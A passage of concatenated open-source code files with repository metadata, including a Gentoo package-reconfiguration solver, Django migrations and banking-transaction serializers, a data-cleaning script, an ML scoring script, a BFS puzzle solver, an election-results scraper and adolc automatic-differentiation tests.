    response = requests.post(endpoint, data=json.dumps(json_data), headers={'content-type': 'application/json'})
    utils.phase_end("Execution ended")
    if response.status_code != requests.codes.ok:
        logging.error("server answered with an error code: " + str(response.status_code))
        return None
    res = response.json()
    if 'error' in res:
        logging.error("server answered with an error message: " + json.dumps(res))
        return None
    return res
# Solver entry point hook: presumably set by the caller to run_local_hyvar or
# run_remote_hyvar before solving (solve_spls calls run_hyvar(data)) — confirm.
run_hyvar = None
##########################################################################
# 1. INITIALIZE THE DATA (COMPUTE REQUEST AND UPDATE THE DATABASE)
##########################################################################
def process_request(pattern_repository, id_repository, config, atoms):
    """
    Translates the user request (*atoms*) plus the USE environment variable
    into solver data: the root spls involved in the request and the
    corresponding SMT constraint.

    Side effects: the pattern repository may gain new patterns and the
    config object records the USE manipulation from the environment.
    """
    patterns = {hyportage_pattern.pattern_create_from_atom(atom) for atom in atoms}
    patterns.update(config.pattern_required_flat)
    # The user's USE configuration comes from the environment.
    config.set_use_manipulation_env(os.environ.get("USE", "").split())
    return smt_encoding.convert_patterns(pattern_repository, id_repository, patterns)
##########################################################################
# 2. SOLVER WRAPPER
##########################################################################
def get_preferences_core(id_repository, mspl, installed_spls, spl_name_set):
    """
    Builds the solver preference, prioritized as follows:
    - remove as few installed (non-deprecated) packages as possible,
    - minimize the number of new packages to install.
    Returns a one-element list holding the preference expression.
    """
    kept = {
        name for name in installed_spls.iterkeys()
        if name in spl_name_set and not mspl[name].is_deprecated}
    to_install = spl_name_set - kept
    # Reward keeping installed, non-deprecated packages.
    preference = '0'
    if kept:
        preference = " + ".join(
            smt_encoding.get_spl_hyvarrec(id_repository, name) for name in kept)
    # Penalize each newly installed package.
    if to_install:
        penalty = " + ".join(
            smt_encoding.get_spl_hyvarrec(id_repository, name) for name in to_install)
        preference = preference + " - (" + penalty + ")"
    return [preference]
def get_preferences_use_flags(id_repository, mspl, spl_names):
    """
    This function translates the use flag default selection of the spl in parameter into a preferences
    TODO: implement this function. It requires an API change in the SPL class to do it efficiently.
    :param id_repository: the id repository of hyportage
    :param mspl: the mspl of hyportage
    :param spl_names: the names of the spls to include in the preferences construction
    :return: an equation encoding the default configuration of the spls in parameter
    """
    # Unimplemented stub: the two sets below are placeholders and the
    # constant 0 is a neutral preference (see the TODO above).
    use_flags_positive = set()
    use_flag_negative = set()
    return 0
def installed_spls_to_solver(id_repository, installed_spls, spl_names):
    """Translate the installed spls (restricted to *spl_names*) into the
    hyvarrec feature identifiers expected by the solver."""
    return [
        smt_encoding.get_spl_hyvarrec(id_repository, spl_name)
        for spl_name, use_selection in installed_spls.iteritems()
        if spl_name in spl_names]
def get_better_constraint_visualization(id_repository, mspl, constraints):
    """
    function that manipulates the constraints in a more readable form for analysing them.
    Useful for debugging or error reporting.
    Each SMT-LIB constraint is re-parsed, its internal package ids (pNNN) and
    use-flag ids (uNNN) are substituted with human-readable names, and the
    result is prefixed with the spl that declared it (or "user-required").
    :param id_repository: the id repository of hyportage
    :param mspl: the mspl of hyportage
    :param constraints: the constraints to manipulate
    :return: the manipulated constraints
    """
    ls = []
    parser = SmtLib20Parser()
    for i in constraints:
        # Re-parse the SMT-LIB string to get a formula object back.
        f = cStringIO.StringIO(i)
        script = parser.get_script(f)
        f.close()
        formula = script.get_last_formula()
        formula = pysmt.shortcuts.to_smtlib(formula, daggify=False)
        # translate packages: replace every pNNN id with the spl name, and
        # remember which spl declared this constraint (if any).
        where_declared = "user-required: "
        spl_ids = set(re.findall('(p[0-9]+)', formula))
        for spl_id in spl_ids:
            name = id_repository.ids[spl_id][1]
            formula = re.sub(spl_id, name, formula)
            if i in mspl[name].smt:
                where_declared = name + ": "
        # translate uses: uNNN becomes "<spl>#<use-flag>".
        use_ids = set(re.findall('(u[0-9]+)', formula))
        for use_id in use_ids:
            formula = re.sub(use_id, id_repository.ids[use_id][2] + "#" + id_repository.ids[use_id][1], formula)
        ls.append(where_declared + formula)
    return ls
def generate_to_install_spls(id_repository, mspl, feature_list):
    """
    translate the output of the solver into a system to install (mapping from spl names to use flag selection)
    :param id_repository: the id repository of hyportage
    :param mspl: the mspl of hyportage
    :param feature_list: the solution found by the solver
    :return: a dictionary spl_name -> use flag selection
    """
    # 1. translate the computed solution into a configuration:
    # first collect selected packages, then attach the use flags the solver
    # selected for those packages.
    res_core = core_data.dictSet()
    use_flags = []
    for feature in feature_list:
        el = id_repository.data_from_id(feature)
        if el[0] == "package":  # el = ("package", spl_name)
            res_core.add_key(el[1])
        else:  # el = ("use", use, spl_name)
            use_flags.append((el[1], el[2]))
    for use_flag, spl_name in use_flags:
        # Ignore use flags of packages that were not selected.
        if spl_name in res_core:
            res_core.add(spl_name, use_flag)
    # 2. compares the computed solution to the actual spl use flag configuration, and generate the final configuration:
    # when the solver kept the core selection unchanged, reuse the full
    # selection; otherwise merge the solver's core choice with the
    # non-core flags of the existing configuration.
    res = core_data.dictSet()
    for spl_name, use_selection_core in res_core.iteritems():
        spl = mspl[spl_name]
        if spl.use_selection_core == use_selection_core:
            res[spl_name] = spl.use_selection_full
        else:
            annex_use_flags = spl.use_selection_full - spl.iuses_core
            res[spl_name] = use_selection_core | annex_use_flags
    return res
def solve_spls(
        id_repository, config, mspl, spl_groups,
        spls, annex_constraint, exploration_use, exploration_mask, exploration_keywords, explain_modality=False):
    """
    Solves the spls in input locally assuming that there is a command hyvar-rec
    :param id_repository: the id repository of hyportage
    :param config: the config of hyportage
    :param mspl: the mspl of hyportage
    :param spl_groups: the spl groups of hyportage
    :param spls: the spls to solve
    :param annex_constraint: the additional constraint to add in the solver input
    :param exploration_use: boolean saying if the solver can change the use flag default selection
    :param exploration_mask: boolean saying if the solver can change the use mask status of the packages
    :param exploration_keywords: boolean saying if the solver can change the keywords of the packages
    :param explain_modality: boolean saying if a problem should be explained (by default: False)
    :return: the solution found by the solver, if it exists
    """
    # 1. construct the input data for the solver
    # 1.1. construct the constraint
    constraint = annex_constraint[:]
    spl_group_names = core_data.dictSet()
    #tmp = 0
    for spl in spls:
        spl_group_names.add(core_data.spl_core_get_spl_group_name(spl.core), spl)
        # An spl can be installed only if unmasked (or if mask/keyword
        # exploration is enabled); otherwise it is forced to False.
        included = (spl.unmasked or exploration_mask) and (spl.unmasked_keyword or exploration_keywords)
        if included:
            #tmp = tmp + 1
            constraint.extend(spl.smt)
            if exploration_use:
                constraint.extend(spl.smt_use_exploration)
            else:
                constraint.extend(spl.smt_use_selection)
        else:
            #logging.info("spl \"" + spl.name + "\" is not scheduled for possible installation")
            constraint.extend(spl.smt_false)
    # Group-level constraints, plus forcing to False the group members that
    # were not part of the input spls.
    for spl_group_name, spls_tmp in spl_group_names.iteritems():
        spl_group = spl_groups[spl_group_name]
        constraint.extend(spl_group.smt)
        for spl in spl_group:
            if spl not in spls_tmp: constraint.append(smt_encoding.smt_to_string(smt_encoding.get_spl_smt_not(id_repository, spl.name)))
    #logging.info("included spl: " + str(tmp))
    logging.debug("number of constraints to solve: " + str(len(constraint)))
    # 1.2. construct the preferences
    spl_names = {spl.name for spl in spls}
    preferences = get_preferences_core(id_repository, mspl, config.installed_packages, spl_names)
    # 1.3. construct the current system
    current_system = [] #installed_spls_to_solver(id_repository, installed_spls, spl_names)
    data_configuration = {"selectedFeatures": current_system, "attribute_values": [], "context_values": []}  # current configuration
    data_smt_constraints = {"formulas": constraint, "features": [], "other_int_symbols": []}
    data = {
        "attributes": [],  # attributes of the features (empty in our case)
        "contexts": [],  # contexts to consider (empty in our case)
        "configuration": data_configuration,
        "constraints": [],  # constraints to fill in hyvarrec format (empty in our case for efficiency)
        "preferences": preferences,  # preferences in hyvarrec format
        "smt_constraints": data_smt_constraints,
        "hyvar_options": ["--features-as-boolean", "--constraints-minimization", "--no-default-preferences"]
    }
    # 2. run hyvar-rec (run_hyvar is the module-level dispatch hook)
    res = run_hyvar(data)
    if res is None: return None
    logging.debug("HyVarRec output: " + json.dumps(res))
    # 4. managing the solver output
    if res["result"] != "sat":
        if explain_modality:
            # todo handle explain modality when the answer is unsat
            # try to print a better explanation of the constraints
            constraints = get_better_constraint_visualization(id_repository, mspl, res["constraints"])
            logging.error("Conflict detected. Explanation:\n" + "\n".join(constraints) + '\n')
        return None
    return generate_to_install_spls(id_repository, mspl, res['features'])
def generate_installation_files(
        mspl,
        path_emerge_script, path_use_flag_configuration, path_mask_configuration, path_keywords_configuration,
        old_installation, new_installation):
    """
    This function generates four files from the solver's solution:
    1. the script file to execute to install and uninstall the spls found by the solver
    2. the spl use-flag configuration file (usually package.use)
    3. the unmask configuration file
    4. the accept_keywords configuration file
    :param mspl: the mspl of hyportage
    :param path_emerge_script: path to the script file to generate
    :param path_use_flag_configuration: path to the configuration file to generate
    :param path_mask_configuration: the path to the unmask file to generate
    :param path_keywords_configuration: the path to the accept_keywords file to generate
    :param old_installation: the currently installed spls
    :param new_installation: the spls to install, found by the solver
    :return: None (but the script file has been generated)
    """
    # NOTE(review): the emitted header text contains the typo
    # "will will overwritten" — should read "will be overwritten".
    # the spls to emerge are the ones that are not present in the old installation, or that have a new configuration
    added_spl_names = []
    for spl_name, product in new_installation.iteritems():
        if spl_name in old_installation:
            if old_installation[spl_name] != product:
                added_spl_names.append(spl_name)
        else: added_spl_names.append(spl_name)
    # the spls to remove are the ones that are not in the new configuration and that are not replaced by a new version
    removed_spl_names = []
    new_spl_goups_info = core_data.dictSet()
    for spl_name in new_installation.iterkeys():
        spl = mspl[spl_name]
        new_spl_goups_info.add(core_data.spl_core_get_spl_group_name(spl.core), spl)
    for spl_name in old_installation.iterkeys():
        spl = mspl[spl_name]
        new_versions = new_spl_goups_info.get(core_data.spl_core_get_spl_group_name(spl.core))
        if new_versions is None:
            removed_spl_names.append(spl_name)
        else:
            # A different version in the same slot replaces the old one.
            replaced = False
            for new_spl in new_versions:
                if (spl.slot == new_spl.slot) and (spl.name != new_spl.name):
                    replaced = True
                    break
            if replaced: removed_spl_names.append(spl_name)
    # write the files
    added_spl_names.sort()
    with open(path_emerge_script, 'w') as f:
        f.write("#!/bin/bash\n")
        f.write("\n")
        f.write("# File auto-generated by the hyportage tool\n")
        f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
        f.write("\n")
        if added_spl_names:
            f.write("emerge -p --newuse " + " ".join(["=" + spl_name for spl_name in added_spl_names]) + "\n")
        if removed_spl_names:
            f.write("emerge -p --unmerge " + " ".join(["=" + spl_name for spl_name in removed_spl_names]) + "\n")
        f.write("\n")
    with open(path_use_flag_configuration, 'w') as f:
        f.write("# File auto-generated by the hyportage tool\n")
        f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
        f.write("\n")
        for spl_name in added_spl_names:
            # One line per spl: selected flags, then the unselected ones
            # prefixed with '-'.
            use_selection = new_installation[spl_name]
            string = "=" + spl_name + " "
            string = string + " ".join(use_selection)
            use_unselection = mspl[spl_name].iuses_full - use_selection
            if use_unselection:
                string = string + " -" + " -".join(use_unselection) + "\n"
            f.write(string)
        f.write("\n")
    with open(path_mask_configuration, 'w') as f:
        f.write("# File auto-generated by the hyportage tool\n")
        f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
        f.write("\n")
        for spl_name in added_spl_names:
            f.write("=" + spl_name + "\n")
            #if not mspl[spl_name].unmasked:
            #	f.write("=" + spl_name)
        f.write("\n")
    with open(path_keywords_configuration, 'w') as f:
        f.write("# File auto-generated by the hyportage tool\n")
        f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
        f.write("\n")
        for spl_name in added_spl_names:
            #f.write("=" + spl_name + " ~" + hyportage_db.mspl_config.arch + "\n")
            f.write("=" + spl_name + " **\n")
            #if not mspl[spl_name].unmasked_keyword:
            #	f.write("=" + spl_name + " ~" + hyportage_db.mspl_config.arch)
        f.write("\n")
##########################################################################
# 3. SPL SET COMPUTATION
##########################################################################
def next_spls(pattern_repository, spl):
    """Return the set of spls matched by any dependency pattern of *spl*."""
    successors = set()
    for pattern in spl.dependencies.iterkeys():
        successors.update(pattern_repository.get_with_default(pattern).matched_spls)
    return successors
def get_dependency_transitive_closure(pattern_repository, mspl, spls):
    """Compute the closure of *spls* under the dependency relation given by
    next_spls, using a breadth-first frontier.

    Marks every spl in *mspl* with a `visited` attribute as a side effect.
    """
    for spl in mspl.itervalues():
        spl.visited = False
    closure = set()
    frontier = spls
    while len(frontier) > 0:
        candidates = set()
        for spl in frontier:
            spl.visited = True
            closure.add(spl)
            candidates.update(next_spls(pattern_repository, spl))
        # Keep only not-yet-visited successors for the next round.
        frontier = [spl for spl in candidates if not spl.visited]
    return closure
|
HyVar/gentoo_to_mspl
|
host/scripts/reconfigure.py
|
reconfigure.py
|
py
| 16,982 |
python
|
en
|
code
| 10 |
github-code
|
6
|
31215041211
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Adds averageGrade and responseRate to Teacher and defaults quarters to 0."""

    dependencies = [
        # Must be applied after the initial siteScrape schema migration.
        ('siteScrape', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='teacher',
            name='averageGrade',
            field=models.CharField(default=b'', max_length=3),
        ),
        migrations.AddField(
            model_name='teacher',
            name='responseRate',
            # Stored as D.DD (max_digits=3, decimal_places=2), e.g. a 0-1 rate.
            field=models.DecimalField(default=0, max_digits=3, decimal_places=2),
        ),
        migrations.AlterField(
            model_name='teacher',
            name='quarters',
            field=models.IntegerField(default=0),
        ),
    ]
|
anikan/Classify
|
migrations/0002_auto_20150910_1439.py
|
0002_auto_20150910_1439.py
|
py
| 755 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38465761430
|
from Christiaan.csvLoading.CSVLoader import read_csv_tableau
from Christiaan.dataCleaning.dataCleaner import cleanTechColumn
import pandas as pd
import numpy as np
def readTechCSV(filename):
    """Load a Tableau technology export, keep the relevant columns under
    cleaned names, and return the frame sorted by employee number."""
    raw_columns = ['Employee Number', 'Firstname Firstname', 'Lastname Lastname',
                   'Level Level', 'Practice Practice', 'Suggested Daily Rate', 'Name Name']
    clean_columns = ['Employee Number', 'Firstname', 'Lastname',
                     'Level', 'Practice', 'Suggested Daily Rate', 'Technology']
    df = read_csv_tableau(filename, filename)[raw_columns]
    df.columns = clean_columns
    df.sort_values('Employee Number', inplace=True)
    return df
def fixLevels(dataFrame):
    """Apply manual per-employee level corrections, then normalize the
    numbered senior grades ('Senior 13', 'Senior 8') to plain 'Senior'.

    Rows for Vasilij Nevlev are removed entirely.  The frame is mutated
    in place and also returned.
    """
    # (first name, last name) -> corrected level; None means drop the rows.
    # Replaces the former parallel name lists + always-true elif chain.
    corrections = {
        ('Jean-Francois', 'Gigot'): 'Director',
        ('Arnaud', 'Deflorenne'): 'Partner',
        ('Vasilij', 'Nevlev'): None,
        ('Pieter', 'Vandamme'): 'Director',
        ('Koen', 'Dils'): 'Director',
        ('Faisal', 'Orakzai'): 'Senior',
        ('Gunther', 'Hellebaut'): 'Senior',
        ('Philip', 'Allegaert'): 'Director',
        ('Geoffrey', 'Moerenhoudt'): 'Consultant',
    }
    for (first, last), level in corrections.items():
        mask = np.logical_and(dataFrame.Firstname == first, dataFrame.Lastname == last)
        if level is None:
            dataFrame.drop(dataFrame[mask].index, axis=0, inplace=True)
        else:
            dataFrame.loc[mask, 'Level'] = level
    # Collapse the numbered senior grades into a single 'Senior' level.
    dataFrame.loc[np.logical_or(dataFrame.Level == 'Senior 13', dataFrame.Level == 'Senior 8'), 'Level'] = 'Senior'
    return dataFrame
def cleanTech(dataFrame, techColumnName):
    """Clean the technology column, drop duplicate rows, then fix levels."""
    cleaned = cleanTechColumn(dataFrame, techColumnName)
    cleaned.drop_duplicates(inplace=True)
    return fixLevels(cleaned)
def exportDF(dataFrame, fileName, path=''):
    """Write *dataFrame* to ``path + fileName`` as CSV, without the index."""
    target = path + fileName
    dataFrame.to_csv(path_or_buf=target, sep=',', index=False)
# Read Tableau csv export
# NOTE(review): absolute, user-specific path — consider a CLI argument instead.
file = r'C:\Users\adebola.oshomoji\PycharmProjects\case-keyrus\tableau_technology_export.csv'
df = readTechCSV(file)
# Clean Technology column values and drop duplicates
df = cleanTech(df, 'Technology')
# Write DataFrame to csv
exportDF(df, 'EmployeeTechnologyData.csv')
#print(df.Level.unique())
|
chrike-platinum/training-recommender
|
Ade/visualisationPrep.py
|
visualisationPrep.py
|
py
| 3,541 |
python
|
en
|
code
| 0 |
github-code
|
6
|
648818691
|
from argparse import ArgumentParser
from inference import Infer

# Command line interface: python cli.py <modelname> <imagepath> [--use_gpu]
parser = ArgumentParser()
parser.add_argument("modelname", help="name of model to use")
parser.add_argument("imagepath", help="relative path to image")
parser.add_argument("--use_gpu", help="use gpu or not", nargs="?", default=False, const=True, type=bool)
args = parser.parse_args()

infer = Infer(args.use_gpu)
try:
    infer.infer(args.imagepath, args.modelname)
except Exception as exc:
    # Was a bare `except:` that hid the actual error (and swallowed
    # SystemExit/KeyboardInterrupt).  Keep the friendly message but
    # surface the cause so failures are diagnosable.
    print("Something BAD happened!!!")
    print(exc)
|
Deepesh22/Crowd-Counting
|
cli.py
|
cli.py
|
py
| 482 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27213329955
|
import sys
from collections import deque
# BOJ-style "virus vaccine" problem: choose exactly M viruses to activate so
# that every empty cell is infected as quickly as possible.
# Cell encoding after preprocessing: 0 = empty, -1 = wall, -2 = inactive virus.
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
INF = 1e9
N, M = map(int, sys.stdin.readline().rstrip().split())
maps = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(N)]
hospital_comb = []  # every size-M subset of virus positions
answer = INF
def dfs(hospital_list, pick_list, idx):
    # Enumerate all combinations of exactly M virus positions into hospital_comb.
    if idx == len(hospital_list):
        if len(pick_list) == M:
            hospital_comb.append(pick_list[:])
        return
    # Branch 1: take hospital_list[idx].
    pick_list.append(hospital_list[idx])
    dfs(hospital_list, pick_list, idx + 1)
    pick_list.pop()
    # Branch 2: skip it.
    dfs(hospital_list, pick_list, idx + 1)
def bfs(hospital_list):
    # Multi-source BFS from the chosen (active) viruses; updates global `answer`.
    global answer
    q = deque([])
    visited = [[False] * N for _ in range(N)]
    time_maps = [[0] * N for _ in range(N)]
    for h in hospital_list:
        q.append((h[0], h[1], 0))
        visited[h[0]][h[1]] = True
    while q:
        x, y, cnt = q.popleft()
        for i in range(4):
            nx, ny = x + dx[i], y + dy[i]
            if 0 <= nx < N and 0 <= ny < N and not visited[nx][ny]:
                # Spread into empty cells (0) and inactive viruses (-2); walls (-1) block.
                if maps[nx][ny] == 0 or maps[nx][ny] == -2:
                    q.append((nx, ny, cnt + 1))
                    visited[nx][ny] = True
                    time_maps[nx][ny] = cnt + 1
    time = 0
    for i in range(N):
        for j in range(N):
            # An empty cell that was never reached: this combination fails.
            if maps[i][j] == 0 and time_maps[i][j] == 0:
                return
            if maps[i][j] == 0:
                time = max(time, time_maps[i][j])
    answer = min(answer, time)
hospital = []
for i in range(N):
    for j in range(N):
        if maps[i][j] == 2:
            # Remember each virus position and mark it inactive (-2).
            hospital.append((i, j))
            maps[i][j] = -2
        if maps[i][j] == 1:
            maps[i][j] = -1  # wall
dfs(hospital, [], 0)
for i in range(len(hospital_comb)):
    bfs(hospital_comb[i])
print(-1) if answer == INF else print(answer)
|
hammii/Algorithm
|
CodeTree_python/바이러스_백신.py
|
바이러스_백신.py
|
py
| 1,804 |
python
|
en
|
code
| 2 |
github-code
|
6
|
38852384412
|
from django.core import validators
from rest_framework import serializers
from django.utils.translation import gettext_lazy as _
from degvabank.apps.account.models import Account
from degvabank.apps.card.models import CreditCard
from degvabank.apps.transaction.utils import is_our_number
from .models import Transaction
class TransactionSerializer(serializers.ModelSerializer):
    """Serialize every field of Transaction, with no extra validation."""

    class Meta:
        model = Transaction
        fields = "__all__"
class UserTransactionSerializer(serializers.ModelSerializer):
    """Validate and create a transaction on behalf of the requesting user.

    Field validators cache the resolved source (account or card) and target
    on the serializer instance so later validators can cross-check them.
    NOTE(review): this relies on DRF invoking field validators in declaration
    order (source -> target -> document_id -> amount) and on one serializer
    instance per request — confirm before reusing instances.
    """
    # Resolved during validation; None until the corresponding validator runs.
    acc = card = dst = dst_not_our = None
    document_id = serializers.CharField(
        write_only=True,
        max_length=15,
        validators=[
            validators.RegexValidator(
                regex=r"^[eEvVjJ]\d+$",
                message=_("your document id is not well formatted"),
            ),
        ],
    )
    def validate_source(self, value):
        """Ensure *value* names an active account or card owned by the requester."""
        user = self.context["request"].user
        self.acc = user.accounts.filter(id=value, is_active=True).first()
        self.card = user.credit_cards.filter(number=value, is_active=True).first()
        if not (self.acc or self.card):
            raise serializers.ValidationError(_("Invalid source account or card"))
        return value
    def validate_target(self, value):
        """Resolve the target; numbers outside this bank are passed through."""
        # TODO: if value not ours: return value
        if not is_our_number(value):
            # Foreign destination: skip local existence/ownership checks.
            self.dst = value
            self.dst_not_our = True
            return value
        dst_acc = Account.objects.filter(id=value, is_active=True).first()
        dst_card = CreditCard.objects.filter(number=value, is_active=True).first()
        if not (dst_acc or dst_card):
            raise serializers.ValidationError(
                _("Target account or card does not exists")
            )
        self.dst = dst_card or dst_acc
        return value
    def validate_document_id(self, value):
        """Cross-check the document id against the resolved local target's owner."""
        if not self.dst_not_our and self.dst and self.dst.user.document_id.lower() != str(value).lower():
            raise serializers.ValidationError(
                _("Target account or card is not associated with that document id")
            )
        return value
    def validate_amount(self, value):
        """Reject amounts exceeding the source account balance or card credit."""
        if self.acc and self.acc.balance < value:
            raise serializers.ValidationError(_("Insufficent balance"))
        if self.card and self.card.credit < value:
            raise serializers.ValidationError(_("Insufficent balance"))
        return value
    class Meta:
        model = Transaction
        fields = [
            "id",
            "source",
            "target",
            "document_id",
            "amount",
            "type",
            "status",
            "reason",
            "date",
        ]
        read_only_fields = ("type", "status", "date", "id")
    def create(self, validated_data):
        """Delegate creation to the Transaction manager with a nested payload."""
        # Keep only keys that are actual model fields (document_id is write-only).
        field_names = [field.name for field in self.Meta.model._meta.get_fields()]
        data = {a: b for a, b in validated_data.items() if a in field_names}
        kwargs = {
            "amount": data["amount"],
            "reason": data["reason"],
            "source": {
                "number": data["source"]
            },
            "target": {
                "number": data["target"],
                "document_id": validated_data["document_id"],
            }
        }
        return self.Meta.model.objects.create_any_transaction(**kwargs)
class TransactionCardSerializer(serializers.Serializer):
    """Card endpoint of a foreign transaction: number, CVV, expiry, owner doc id."""
    number = serializers.CharField()
    security_code = serializers.CharField()
    expiration_date = serializers.DateTimeField()
    document_id = serializers.CharField(
        required=False,
        write_only=True,
        max_length=15,
        validators=[
            validators.RegexValidator(
                regex=r"^[eEvVjJ]\d+$",
                message=_("your document id is not well formatted"),
            ),
        ],
    )
class TransactionAccountSerializer(serializers.Serializer):
    """Account endpoint of a foreign transaction: number plus mandatory doc id."""
    number = serializers.CharField()
    document_id = serializers.CharField(
        required=True,
        write_only=True,
        max_length=15,
        validators=[
            validators.RegexValidator(
                regex=r"^[eEvVjJ]\d+$",
                message=_("your document id is not well formatted"),
            ),
        ],
    )
class ForeignTransactionSerializer(serializers.ModelSerializer):
    """Transaction initiated from outside the bank; exactly one src and one dst
    (account or card) is expected per request.
    NOTE(review): nothing here enforces that at least one source/target pair is
    present — create() would pass source/target = None; confirm upstream checks.
    """
    acc_src = TransactionAccountSerializer(required=False)
    acc_dst = TransactionAccountSerializer(required=False)
    card_src = TransactionCardSerializer(required=False)
    card_dst = TransactionCardSerializer(required=False)
    class Meta:
        model = Transaction
        fields = [
            "id",
            "acc_src",
            "acc_dst",
            "card_src",
            "card_dst",
            "amount",
            "type",
            "status",
            "reason",
            "date",
        ]
        read_only_fields = ("type", "status", "date", "id")
    def create(self, validated_data):
        """Build manager kwargs, preferring the account endpoint over the card."""
        field_names = [field.name for field in self.Meta.model._meta.get_fields()]
        data = {a: b for a, b in validated_data.items() if a in field_names}
        kwargs = {
            "amount": data["amount"],
            "reason": data["reason"],
            "source": validated_data.get("acc_src") or validated_data.get("card_src"),
            "target": validated_data.get("acc_dst") or validated_data.get("card_dst")
        }
        return self.Meta.model.objects.create_any_transaction(from_foreign=True, **kwargs)
|
Vixx-X/DEGVABank-backend
|
degvabank/degvabank/apps/transaction/serializers.py
|
serializers.py
|
py
| 5,507 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35721608965
|
import os
import json
import numpy as np
import preprocessing as preprocessing
from tensorflow import keras
def init():
    """Azure ML entry point: load the model and its artefacts once per container.

    Reads everything from AZUREML_MODEL_DIR/model: the Keras model,
    vocab.json (token vocabulary) and params.json (provides 'max_len').
    """
    global model
    global vocab
    global max_len
    # compile=False: inference only, no optimizer/loss state is needed.
    model = keras.models.load_model(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model'), compile=False)
    with open(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model', 'vocab.json')) as json_file:
        vocab = json.load(json_file)
    with open(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model', 'params.json')) as json_file:
        params = json.load(json_file)
    max_len = params['max_len']
def run(raw_data):
    """Azure ML scoring entry point.

    raw_data: JSON string of the form {"data": [<tweet strings>, ...]}.
    Returns the flattened model predictions as a plain (JSON-serialisable) list.
    """
    tweets = np.array(json.loads(raw_data)["data"])
    # Tokenise/pad using the vocab and max_len loaded in init().
    processed_tweets = preprocessing.process_tweets(tweets, vocab, max_len)
    result = model.predict(processed_tweets).ravel()
    return result.tolist()
|
luisespriella9/disastersLocator
|
src/scoring.py
|
scoring.py
|
py
| 809 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29520352035
|
import requests
from bs4 import BeautifulSoup as bs
import csv
from itertools import chain
def get_urls():
    """
    Return a list of URLs of all subpages containing election results.
    """
    main_page = requests.get("http://www.kosningastofnun.in/")
    page_soup = bs(main_page.content, "html.parser")
    # Each blog-post title carries a link to one results page.
    urls = [title.a.get("href") for title in page_soup.find_all(class_="blog-post-title")]
    return urls
def scrape(urls):
    """
    Take a list of URLs and scrape the first table found at each URL.
    Return a list of dicts where each dict maps table headers to cell values.
    """
    all_dicts = []
    for url in urls:
        elections_page = requests.get(url)
        elections_soup = bs(elections_page.content, "html.parser")
        # Collect all table headers into a list:
        headers = [header.string.strip() for header in elections_soup.find_all("th")]
        # Then walk each row and collect its cell values:
        for row in elections_soup.find_all("tr"):
            results = [cell.string.strip() for cell in row.find_all("td")]
            # Only proceed if this is an actual result row, otherwise do nothing:
            if results:
                # Pair the values with the headers in a dict:
                elections = dict(zip(headers, results))
                # If the date was missing from these results, scrape it
                # from the title and insert it into the dict:
                if "Dagsetning" not in elections:
                    full_title = elections_soup.h2.a.string
                    # Split the title on the first space and keep the second part:
                    elections["Dagsetning"] = full_title.split(" ", 1)[1]
                # Finally append the dict to the big list:
                all_dicts.append(elections)
    return all_dicts
def save_csv(list_of_dicts):
    """
    Write a list of result dicts to "kosningar.csv" in the working directory.

    Fix: the file is opened with newline="" — required by the csv module to
    avoid spurious blank lines on Windows — and an explicit UTF-8 encoding.
    """
    with open("kosningar.csv", "w", newline="", encoding="utf-8") as csv_file:
        # Union of all keys across the dicts (rows may have different columns).
        fieldnames = set([key for key in chain(*list_of_dicts)])
        # Order the columns: alphabetically first, then move the date
        # ("Dagsetning") to the front (cosmetic, not strictly necessary):
        fieldnames = sorted(fieldnames)
        fieldnames = sorted(fieldnames, key=lambda x: x == "Dagsetning", reverse=True)
        writer = csv.DictWriter(csv_file, fieldnames)
        writer.writeheader()
        writer.writerows(list_of_dicts)
# Run the whole pipeline:
if __name__ == "__main__":
    save_csv(scrape(get_urls()))
|
flother/data-acq-viz
|
2018/kosningaskrapari-lausn.py
|
kosningaskrapari-lausn.py
|
py
| 2,713 |
python
|
is
|
code
| 1 |
github-code
|
6
|
72588123388
|
from numpy.testing import *
import numpy
import numpy.random
from adolc import *
from adolc.cgraph import *
from adolc.tangent import *
class TangentOperationsTests(TestCase):
    """Forward-mode arithmetic on Tangent (value, directional derivative) pairs."""
    def test_constructor(self):
        # Both plain floats and active adoubles are accepted as the value part.
        t1 = Tangent(1,2)
        t2 = Tangent(adouble(1),2)
    def test_float_tangent_float_tangent(self):
        tx = Tangent(2.,3.)
        ty = Tangent(5.,7.)
        tz = tx + ty
        assert_array_almost_equal([tz.x,tz.xdot], [2+5, 3+7])
        tz = tx - ty
        assert_array_almost_equal([tz.x,tz.xdot], [2-5, 3-7])
        tz = tx * ty
        # Product rule: (x*y)' = x'*y + x*y'
        assert_array_almost_equal([tz.x,tz.xdot], [2*5, 3*5 + 2*7])
        tz = tx / ty
        # Quotient rule: (x/y)' = (x'*y - x*y') / y**2
        assert_array_almost_equal([tz.x,tz.xdot], [2./5., (3*5 - 2*7.)/5**2])
    def test_double_tangent_adouble(self):
        # Mixing a Tangent with a bare adouble: the adouble contributes no xdot.
        tx = Tangent(2,3)
        ay = adouble(5)
        tz = tx + ay
        assert_array_almost_equal([tz.x.val,tz.xdot], [2+5, 3])
        tz = tx * ay
        assert_array_almost_equal([tz.x.val,tz.xdot.val], [2*5, 3*5])
    def test_adouble_tangent_adouble_addition(self):
        tx = Tangent(adouble(2), 1)
        ty = Tangent(adouble(3), 0)
        tz = tx + ty
        assert_array_almost_equal([tz.x.val,tz.xdot], [5, 1])
class SemiImplicitOdeLhsTest(TestCase):
    """
    This is a test example taken from PYSOLVIND
    In chemical engineering, semi-implicit ODEs of the type::
        d/dt g(t,y(t)) = f(t,y(t))
        y(0) = y_0
    have to be solved. PYSOLVIND requires a function afcn that computes::
        d/dy g(t,y) d/dt y
    where d/dt y = xdd
          y      = xd
    """
    def test_differentiation_of_gfcn(self):
        # gfcn: obtain d/dy g(y) * ydot automatically via forward-mode tangents
